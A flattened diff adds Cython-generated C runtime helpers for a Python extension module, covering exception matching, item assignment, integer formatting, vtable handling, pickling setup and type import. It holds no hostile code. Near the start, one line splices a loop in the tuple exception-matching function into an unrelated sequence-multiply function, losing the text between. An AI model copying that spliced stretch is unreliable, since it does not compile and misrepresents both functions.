*err, PyObject* exc_type1, PyObject* exc_type2) { + PyObject *exception, *value, *tb; + int res; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&exception, &value, &tb); + res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + if (!res) { + res = PyObject_IsSubclass(err, exc_type2); + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + } + __Pyx_ErrRestore(exception, value, tb); + return res; +} +#else +static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { + if (exc_type1) { + return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); + } else { + return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); + } +} +#endif +static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + assert(PyExceptionClass_Check(exc_type)); + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; itp_as_sequence && type->tp_as_sequence->sq_repeat)) { + return type->tp_as_sequence->sq_repeat(seq, mul); + } else +#endif + { + return __Pyx_PySequence_Multiply_Generic(seq, mul); + } +} + +/* SetItemInt */ +static int __Pyx_SetItemInt_Generic(PyObject *o, PyObject *j, PyObject *v) { + int r; + if (unlikely(!j)) return -1; + r = PyObject_SetItem(o, j, v); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE int __Pyx_SetItemInt_Fast(PyObject *o, Py_ssize_t i, PyObject *v, int is_list, + CYTHON_NCP_UNUSED int wraparound, CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = (!wraparound) ? i : ((likely(i >= 0)) ? i : i + PyList_GET_SIZE(o)); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o)))) { + PyObject* old = PyList_GET_ITEM(o, n); + Py_INCREF(v); + PyList_SET_ITEM(o, n, v); + Py_DECREF(old); + return 1; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_ass_subscript) { + int r; + PyObject *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return -1; + r = mm->mp_ass_subscript(o, key, v); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_ass_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return -1; + PyErr_Clear(); + } + } + return sm->sq_ass_item(o, i, v); + } + } +#else +#if CYTHON_COMPILING_IN_PYPY + if (is_list || (PySequence_Check(o) && !PyDict_Check(o))) +#else + if (is_list || PySequence_Check(o)) +#endif + { + return PySequence_SetItem(o, i, v); + } +#endif + return __Pyx_SetItemInt_Generic(o, PyInt_FromSsize_t(i), v); +} + +/* RaiseUnboundLocalError */ +static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname) { + PyErr_Format(PyExc_UnboundLocalError, "local variable '%s' referenced before assignment", varname); +} + +/* DivInt[long] */ +static CYTHON_INLINE long __Pyx_div_long(long a, long b) { + long q = a / b; + long r = a - q*b; + q -= ((r != 0) & ((r ^ b) < 0)); + return q; +} + +/* StringJoin */ +#if !CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyBytes_Join(PyObject* sep, PyObject* values) { + return PyObject_CallMethodObjArgs(sep, __pyx_n_s_join, values, NULL); +} +#endif + +/* CIntToPyUnicode */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_size_t(size_t value, Py_ssize_t width, char padding_char, char format_char) { + char digits[sizeof(size_t)*3+2]; + char *dpos, *end = digits + sizeof(size_t)*3+2; + const char *hex_digits = DIGITS_HEX; + Py_ssize_t length, ulength; + int prepend_sign, last_one_off; + size_t remaining; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const size_t neg_one = (size_t) -1, const_zero = (size_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (format_char == 'X') { + hex_digits += 16; + format_char = 'x'; + } + remaining = value; + last_one_off = 0; + dpos = end; + do { + int digit_pos; + switch (format_char) { + case 'o': + digit_pos = abs((int)(remaining % (8*8))); + remaining = (size_t) (remaining / (8*8)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_8 + digit_pos * 2, 2); + last_one_off = (digit_pos < 8); + break; + case 'd': + digit_pos = abs((int)(remaining % (10*10))); + remaining = (size_t) (remaining / (10*10)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_10 + digit_pos * 2, 2); + last_one_off = (digit_pos < 10); + break; + case 'x': + *(--dpos) = hex_digits[abs((int)(remaining % 16))]; + remaining = (size_t) (remaining / 16); + break; + default: + assert(0); + break; + } + } while (unlikely(remaining != 0)); + assert(!last_one_off || *dpos == '0'); + dpos += last_one_off; + length = end - dpos; + ulength = length; + prepend_sign = 0; + if (!is_unsigned && value <= neg_one) { + if (padding_char == ' ' || width <= length + 1) { + *(--dpos) = '-'; + ++length; + } else { + prepend_sign = 1; + } + ++ulength; + } + if (width > ulength) { + ulength = width; + } + if (ulength == 1) { + return PyUnicode_FromOrdinal(*dpos); + } + return __Pyx_PyUnicode_BuildFromAscii(ulength, dpos, (int) length, prepend_sign, padding_char); +} + +/* decode_c_bytes */ +static CYTHON_INLINE PyObject* __Pyx_decode_c_bytes( + const char* cstring, Py_ssize_t length, Py_ssize_t start, Py_ssize_t stop, + const char* encoding, const char* errors, + PyObject* (*decode_func)(const char *s, Py_ssize_t size, const char *errors)) { + if (unlikely((start < 0) | (stop < 0))) { + if (start < 0) { + start += length; + if (start < 0) + start = 0; + } + if (stop < 0) + stop += length; + } + if (stop > length) + stop = length; + if (unlikely(stop <= start)) + return __Pyx_NewRef(__pyx_empty_unicode); + length = stop - start; + cstring += start; + if (decode_func) { + return decode_func(cstring, length, errors); + } else { + return PyUnicode_Decode(cstring, length, encoding, errors); + } +} + +/* PyObjectCallNoArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func) { + PyObject *arg = NULL; + return __Pyx_PyObject_FastCall(func, (&arg)+1, 0 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* BufferIndexError */ +static void __Pyx_RaiseBufferIndexError(int axis) { + PyErr_Format(PyExc_IndexError, + "Out of bounds on buffer access (axis %d)", axis); +} + +/* PyObject_GenericGetAttrNoDict */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject *__Pyx_RaiseGenericGetAttributeError(PyTypeObject *tp, PyObject *attr_name) { + __Pyx_TypeName type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, attr_name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(attr_name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name) { + PyObject *descr; + PyTypeObject *tp = Py_TYPE(obj); + if (unlikely(!PyString_Check(attr_name))) { + return PyObject_GenericGetAttr(obj, attr_name); + } + assert(!tp->tp_dictoffset); + descr = _PyType_Lookup(tp, attr_name); + if (unlikely(!descr)) { + return __Pyx_RaiseGenericGetAttributeError(tp, attr_name); + } + Py_INCREF(descr); + #if PY_MAJOR_VERSION < 3 + if (likely(PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_HAVE_CLASS))) + #endif + { + descrgetfunc f = Py_TYPE(descr)->tp_descr_get; + if (unlikely(f)) { + PyObject *res = f(descr, obj, (PyObject *)tp); + Py_DECREF(descr); + return res; + } + } + return descr; +} +#endif + +/* PyObject_GenericGetAttr */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name) { + if (unlikely(Py_TYPE(obj)->tp_dictoffset)) { + return PyObject_GenericGetAttr(obj, attr_name); + } + return __Pyx_PyObject_GenericGetAttrNoDict(obj, attr_name); +} +#endif + +/* FixUpExtensionType */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { +#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API + CYTHON_UNUSED_VAR(spec); + CYTHON_UNUSED_VAR(type); +#else + const PyType_Slot *slot = spec->slots; + while (slot && slot->slot && slot->slot != Py_tp_members) + slot++; + if (slot && slot->slot == Py_tp_members) { + int changed = 0; +#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) + const +#endif + PyMemberDef *memb = (PyMemberDef*) slot->pfunc; + while (memb && memb->name) { + if (memb->name[0] == '_' && memb->name[1] == '_') { +#if PY_VERSION_HEX < 0x030900b1 + if (strcmp(memb->name, "__weaklistoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_weaklistoffset = memb->offset; + changed = 1; + } + else if (strcmp(memb->name, "__dictoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_dictoffset = memb->offset; + changed = 1; + } +#if CYTHON_METH_FASTCALL + else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); +#if PY_VERSION_HEX >= 0x030800b4 + type->tp_vectorcall_offset = memb->offset; +#else + type->tp_print = (printfunc) memb->offset; +#endif + changed = 1; + } +#endif +#else + if ((0)); +#endif +#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON + else if (strcmp(memb->name, "__module__") == 0) { + PyObject *descr; + assert(memb->type == T_OBJECT); + assert(memb->flags == 0 || memb->flags == READONLY); + descr = PyDescr_NewMember(type, memb); + if (unlikely(!descr)) + return -1; + if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { + Py_DECREF(descr); + return -1; + } + Py_DECREF(descr); + changed = 1; + } +#endif + } + memb++; + } + if (changed) + PyType_Modified(type); + } +#endif + return 0; +} +#endif + +/* PyObjectGetMethod */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method) { + PyObject *attr; +#if CYTHON_UNPACK_METHODS && CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_PYTYPE_LOOKUP + __Pyx_TypeName type_name; + PyTypeObject *tp = Py_TYPE(obj); + PyObject *descr; + descrgetfunc f = NULL; + PyObject **dictptr, *dict; + int meth_found = 0; + assert (*method == NULL); + if (unlikely(tp->tp_getattro != PyObject_GenericGetAttr)) { + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; + } + if (unlikely(tp->tp_dict == NULL) && unlikely(PyType_Ready(tp) < 0)) { + return 0; + } + descr = _PyType_Lookup(tp, name); + if (likely(descr != NULL)) { + Py_INCREF(descr); +#if defined(Py_TPFLAGS_METHOD_DESCRIPTOR) && Py_TPFLAGS_METHOD_DESCRIPTOR + if (__Pyx_PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_METHOD_DESCRIPTOR)) +#elif PY_MAJOR_VERSION >= 3 + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type))) + #endif +#else + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr))) + #endif +#endif + { + meth_found = 1; + } else { + f = Py_TYPE(descr)->tp_descr_get; + if (f != NULL && PyDescr_IsData(descr)) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + } + } + dictptr = _PyObject_GetDictPtr(obj); + if (dictptr != NULL && (dict = *dictptr) != NULL) { + Py_INCREF(dict); + attr = __Pyx_PyDict_GetItemStr(dict, name); + if (attr != NULL) { + Py_INCREF(attr); + Py_DECREF(dict); + Py_XDECREF(descr); + goto try_unpack; + } + Py_DECREF(dict); + } + if (meth_found) { + *method = descr; + return 1; + } + if (f != NULL) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + if (likely(descr != NULL)) { + *method = descr; + return 0; + } + type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return 0; +#else + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; +#endif +try_unpack: +#if CYTHON_UNPACK_METHODS + if (likely(attr) && PyMethod_Check(attr) && likely(PyMethod_GET_SELF(attr) == obj)) { + PyObject *function = PyMethod_GET_FUNCTION(attr); + Py_INCREF(function); + Py_DECREF(attr); + *method = function; + return 1; + } +#endif + *method = attr; + return 0; +} + +/* PyObjectCallMethod0 */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name) { + PyObject *method = NULL, *result = NULL; + int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); + if (likely(is_method)) { + result = __Pyx_PyObject_CallOneArg(method, obj); + Py_DECREF(method); + return result; + } + if (unlikely(!method)) goto bad; + result = __Pyx_PyObject_CallNoArg(method); + Py_DECREF(method); +bad: + return result; +} + +/* ValidateBasesTuple */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases) { + Py_ssize_t i, n = PyTuple_GET_SIZE(bases); + for (i = 1; i < n; i++) + { + PyObject *b0 = PyTuple_GET_ITEM(bases, i); + PyTypeObject *b; +#if PY_MAJOR_VERSION < 3 + if (PyClass_Check(b0)) + { + PyErr_Format(PyExc_TypeError, "base class '%.200s' is an old-style class", + PyString_AS_STRING(((PyClassObject*)b0)->cl_name)); + return -1; + } +#endif + b = (PyTypeObject*) b0; + if (!__Pyx_PyType_HasFeature(b, Py_TPFLAGS_HEAPTYPE)) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "base class '" __Pyx_FMT_TYPENAME "' is not a heap type", b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + if (dictoffset == 0 && b->tp_dictoffset) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "extension type '%.200s' has no __dict__ slot, " + "but base type '" __Pyx_FMT_TYPENAME "' has: " + "either add 'cdef dict __dict__' to the extension type " + "or add '__slots__ = [...]' to the base type", + type_name, b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + } + return 0; +} +#endif + +/* PyType_Ready */ +static int __Pyx_PyType_Ready(PyTypeObject *t) { +#if CYTHON_USE_TYPE_SPECS || !(CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API) || defined(PYSTON_MAJOR_VERSION) + (void)__Pyx_PyObject_CallMethod0; +#if CYTHON_USE_TYPE_SPECS + (void)__Pyx_validate_bases_tuple; +#endif + return PyType_Ready(t); +#else + int r; + PyObject *bases = __Pyx_PyType_GetSlot(t, tp_bases, PyObject*); + if (bases && unlikely(__Pyx_validate_bases_tuple(t->tp_name, t->tp_dictoffset, bases) == -1)) + return -1; +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + { + int gc_was_enabled; + #if PY_VERSION_HEX >= 0x030A00b1 + gc_was_enabled = PyGC_Disable(); + (void)__Pyx_PyObject_CallMethod0; + #else + PyObject *ret, *py_status; + PyObject *gc = NULL; + #if PY_VERSION_HEX >= 0x030700a1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM+0 >= 0x07030400) + gc = PyImport_GetModule(__pyx_kp_u_gc); + #endif + if (unlikely(!gc)) gc = PyImport_Import(__pyx_kp_u_gc); + if (unlikely(!gc)) return -1; + py_status = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_isenabled); + if (unlikely(!py_status)) { + Py_DECREF(gc); + return -1; + } + gc_was_enabled = __Pyx_PyObject_IsTrue(py_status); + Py_DECREF(py_status); + if (gc_was_enabled > 0) { + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_disable); + if (unlikely(!ret)) { + Py_DECREF(gc); + return -1; + } + Py_DECREF(ret); + } else if (unlikely(gc_was_enabled == -1)) { + Py_DECREF(gc); + return -1; + } + #endif + t->tp_flags |= Py_TPFLAGS_HEAPTYPE; +#if PY_VERSION_HEX >= 0x030A0000 + t->tp_flags |= Py_TPFLAGS_IMMUTABLETYPE; +#endif +#else + (void)__Pyx_PyObject_CallMethod0; +#endif + r = PyType_Ready(t); +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + t->tp_flags &= ~Py_TPFLAGS_HEAPTYPE; + #if PY_VERSION_HEX >= 0x030A00b1 + if (gc_was_enabled) + PyGC_Enable(); + #else + if (gc_was_enabled) { + PyObject *tp, *v, *tb; + PyErr_Fetch(&tp, &v, &tb); + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_enable); + if (likely(ret || r == -1)) { + Py_XDECREF(ret); + PyErr_Restore(tp, v, tb); + } else { + Py_XDECREF(tp); + Py_XDECREF(v); + Py_XDECREF(tb); + r = -1; + } + } + Py_DECREF(gc); + #endif + } +#endif + return r; +#endif +} + +/* SetVTable */ +static int __Pyx_SetVtable(PyTypeObject *type, void *vtable) { + PyObject *ob = PyCapsule_New(vtable, 0, 0); + if (unlikely(!ob)) + goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(PyObject_SetAttr((PyObject *) type, __pyx_n_s_pyx_vtable, ob) < 0)) +#else + if (unlikely(PyDict_SetItem(type->tp_dict, __pyx_n_s_pyx_vtable, ob) < 0)) +#endif + goto bad; + Py_DECREF(ob); + return 0; +bad: + Py_XDECREF(ob); + return -1; +} + +/* GetVTable */ +static void* __Pyx_GetVtable(PyTypeObject *type) { + void* ptr; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *ob = PyObject_GetAttr((PyObject *)type, __pyx_n_s_pyx_vtable); +#else + PyObject *ob = PyObject_GetItem(type->tp_dict, __pyx_n_s_pyx_vtable); +#endif + if (!ob) + goto bad; + ptr = PyCapsule_GetPointer(ob, 0); + if (!ptr && !PyErr_Occurred()) + PyErr_SetString(PyExc_RuntimeError, "invalid vtable found for imported type"); + Py_DECREF(ob); + return ptr; +bad: + Py_XDECREF(ob); + return NULL; +} + +/* MergeVTables */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_MergeVtables(PyTypeObject *type) { + int i; + void** base_vtables; + __Pyx_TypeName tp_base_name; + __Pyx_TypeName base_name; + void* unknown = (void*)-1; + PyObject* bases = type->tp_bases; + int base_depth = 0; + { + PyTypeObject* base = type->tp_base; + while (base) { + base_depth += 1; + base = base->tp_base; + } + } + base_vtables = (void**) malloc(sizeof(void*) * (size_t)(base_depth + 1)); + base_vtables[0] = unknown; + for (i = 1; i < PyTuple_GET_SIZE(bases); i++) { + void* base_vtable = __Pyx_GetVtable(((PyTypeObject*)PyTuple_GET_ITEM(bases, i))); + if (base_vtable != NULL) { + int j; + PyTypeObject* base = type->tp_base; + for (j = 0; j < base_depth; j++) { + if (base_vtables[j] == unknown) { + base_vtables[j] = __Pyx_GetVtable(base); + base_vtables[j + 1] = unknown; + } + if (base_vtables[j] == base_vtable) { + break; + } else if (base_vtables[j] == NULL) { + goto bad; + } + base = base->tp_base; + } + } + } + PyErr_Clear(); + free(base_vtables); + return 0; +bad: + tp_base_name = __Pyx_PyType_GetName(type->tp_base); + base_name = __Pyx_PyType_GetName((PyTypeObject*)PyTuple_GET_ITEM(bases, i)); + PyErr_Format(PyExc_TypeError, + "multiple bases have vtable conflict: '" __Pyx_FMT_TYPENAME "' and '" __Pyx_FMT_TYPENAME "'", tp_base_name, base_name); + __Pyx_DECREF_TypeName(tp_base_name); + __Pyx_DECREF_TypeName(base_name); + free(base_vtables); + return -1; +} +#endif + +/* SetupReduce */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce_is_named(PyObject* meth, PyObject* name) { + int ret; + PyObject *name_attr; + name_attr = __Pyx_PyObject_GetAttrStrNoError(meth, __pyx_n_s_name_2); + if (likely(name_attr)) { + ret = PyObject_RichCompareBool(name_attr, name, Py_EQ); + } else { + ret = -1; + } + if (unlikely(ret < 0)) { + PyErr_Clear(); + ret = 0; + } + Py_XDECREF(name_attr); + return ret; +} +static int __Pyx_setup_reduce(PyObject* type_obj) { + int ret = 0; + PyObject *object_reduce = NULL; + PyObject *object_getstate = NULL; + PyObject *object_reduce_ex = NULL; + PyObject *reduce = NULL; + PyObject *reduce_ex = NULL; + PyObject *reduce_cython = NULL; + PyObject *setstate = NULL; + PyObject *setstate_cython = NULL; + PyObject *getstate = NULL; +#if CYTHON_USE_PYTYPE_LOOKUP + getstate = _PyType_Lookup((PyTypeObject*)type_obj, __pyx_n_s_getstate); +#else + getstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_getstate); + if (!getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (getstate) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_getstate = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_getstate); +#else + object_getstate = __Pyx_PyObject_GetAttrStrNoError((PyObject*)&PyBaseObject_Type, __pyx_n_s_getstate); + if (!object_getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (object_getstate != getstate) { + goto __PYX_GOOD; + } + } +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce_ex = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#else + object_reduce_ex = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#endif + reduce_ex = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce_ex); if (unlikely(!reduce_ex)) goto __PYX_BAD; + if (reduce_ex == object_reduce_ex) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#else + object_reduce = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#endif + reduce = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce); if (unlikely(!reduce)) goto __PYX_BAD; + if (reduce == object_reduce || __Pyx_setup_reduce_is_named(reduce, __pyx_n_s_reduce_cython)) { + reduce_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_reduce_cython); + if (likely(reduce_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce, reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (reduce == object_reduce || PyErr_Occurred()) { + goto __PYX_BAD; + } + setstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate); + if (!setstate) PyErr_Clear(); + if (!setstate || __Pyx_setup_reduce_is_named(setstate, __pyx_n_s_setstate_cython)) { + setstate_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate_cython); + if (likely(setstate_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate, setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (!setstate || PyErr_Occurred()) { + goto __PYX_BAD; + } + } + PyType_Modified((PyTypeObject*)type_obj); + } + } + goto __PYX_GOOD; +__PYX_BAD: + if (!PyErr_Occurred()) { + __Pyx_TypeName type_obj_name = + __Pyx_PyType_GetName((PyTypeObject*)type_obj); + PyErr_Format(PyExc_RuntimeError, + "Unable to initialize pickling for " __Pyx_FMT_TYPENAME, type_obj_name); + __Pyx_DECREF_TypeName(type_obj_name); + } + ret = -1; +__PYX_GOOD: +#if !CYTHON_USE_PYTYPE_LOOKUP + Py_XDECREF(object_reduce); + Py_XDECREF(object_reduce_ex); + Py_XDECREF(object_getstate); + Py_XDECREF(getstate); +#endif + Py_XDECREF(reduce); + Py_XDECREF(reduce_ex); + Py_XDECREF(reduce_cython); + Py_XDECREF(setstate); + Py_XDECREF(setstate_cython); + return ret; +} +#endif + +/* TypeImport */ +#ifndef __PYX_HAVE_RT_ImportType_3_0_0 +#define __PYX_HAVE_RT_ImportType_3_0_0 +static PyTypeObject *__Pyx_ImportType_3_0_0(PyObject *module, const char *module_name, const char *class_name, + size_t size, size_t alignment, enum __Pyx_ImportType_CheckSize_3_0_0 check_size) +{ + PyObject *result = 0; + char warning[200]; + Py_ssize_t basicsize; + Py_ssize_t itemsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + PyObject *py_itemsize; +#endif + result = PyObject_GetAttrString(module, class_name); + if (!result) + goto bad; + if (!PyType_Check(result)) { + PyErr_Format(PyExc_TypeError, + "%.200s.%.200s is not a type object", + module_name, class_name); + goto bad; + } +#if !CYTHON_COMPILING_IN_LIMITED_API + basicsize = ((PyTypeObject *)result)->tp_basicsize; + itemsize = ((PyTypeObject *)result)->tp_itemsize; +#else + py_basicsize = PyObject_GetAttrString(result, "__basicsize__"); + if (!py_basicsize) + goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (basicsize == (Py_ssize_t)-1 && PyErr_Occurred()) + goto bad; + py_itemsize = PyObject_GetAttrString(result, "__itemsize__"); + if (!py_itemsize) + goto bad; + itemsize = PyLong_AsSsize_t(py_itemsize); + Py_DECREF(py_itemsize); + py_itemsize = 0; + if (itemsize == (Py_ssize_t)-1 && PyErr_Occurred()) + goto bad; +#endif + if (itemsize) { + if (size % alignment) { + alignment = size % alignment; + } + if (itemsize < (Py_ssize_t)alignment) + itemsize = (Py_ssize_t)alignment; + } + if ((size_t)(basicsize + itemsize) < size) { + PyErr_Format(PyExc_ValueError, + "%.200s.%.200s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd from PyObject", + module_name, class_name, size, basicsize+itemsize); + goto bad; + } + if (check_size == __Pyx_ImportType_CheckSize_Error_3_0_0 && + ((size_t)basicsize > size || (size_t)(basicsize + itemsize) < size)) { + PyErr_Format(PyExc_ValueError, + "%.200s.%.200s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd-%zd from PyObject", + module_name, class_name, size, basicsize, basicsize+itemsize); + goto bad; + } + else if (check_size == __Pyx_ImportType_CheckSize_Warn_3_0_0 && (size_t)basicsize > size) { + PyOS_snprintf(warning, sizeof(warning), + "%s.%s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd from PyObject", + module_name, class_name, size, basicsize); + if (PyErr_WarnEx(NULL, warning, 0) < 0) goto bad; + } + return (PyTypeObject *)result; +bad: + Py_XDECREF(result); + return NULL; +} +#endif + +/* FetchSharedCythonModule */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void) { + PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); + if (unlikely(!abi_module)) return NULL; + Py_INCREF(abi_module); + return abi_module; +} + +/* FetchCommonType */ +static int __Pyx_VerifyCachedType(PyObject *cached_type, + const char *name, + Py_ssize_t basicsize, + Py_ssize_t expected_basicsize) { + if (!PyType_Check(cached_type)) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s is not a type object", name); + return -1; + } + if (basicsize != expected_basicsize) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s has the wrong size, try recompiling", + name); + return -1; + } + return 0; +} +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { + PyObject* abi_module; + const char* object_name; + PyTypeObject *cached_type = NULL; + abi_module = 